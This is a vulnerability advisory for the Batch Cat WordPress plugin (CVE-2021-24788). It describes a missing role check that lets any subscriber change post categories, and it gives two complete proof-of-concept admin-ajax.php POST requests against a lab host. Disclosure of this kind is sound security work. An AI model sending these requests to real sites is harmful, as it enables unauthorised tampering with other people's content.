Lucene search
Quentin VILLAIN (3wsec)WPEX-ID:F8FDFF8A-F158-46E8-94F1-F051A6C5608BHistoryOct 05, 2021 - 12:00 a.m.
Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts
2021-10-0500:00:00
Quentin VILLAIN (3wsec)
436
batch cat plugin
arbitrary categories
modification
security exploit
EPSS
0.001
Percentile
24.8%
The plugin defines 3 custom AJAX actions, which both require authentication but are available for all roles. As a result, any authenticated user (including simple subscribers) can add/set/delete arbitrary categories to posts.
Set the category 107 to the post 1537:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]
action=bcat_set_category&post_ids=1537&cat_ids=107
Delete the category 107 from the post 1537:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]
action=bcat_del_category&post_ids=1537&cat_ids=107Related
nvd
nvd
CVE-2021-24788
2021-11-08 18:15:09
wpvulndb
wpvulndb
Batch Cat <= 0.3 - Subscriber+ Arbitrary Categories Add/Set/Delete to Posts
2021-10-05 00:00:00
patchstack
patchstack
cnvd
cnvd
WordPress Plugin Access Control Error Vulnerability (CNVD-2021-101471)
2021-11-10 00:00:00
cve
cve
CVE-2021-24788
2021-11-08 18:15:09
cvelist
cvelist
prion
prion
Authentication flaw
2021-11-08 18:15:00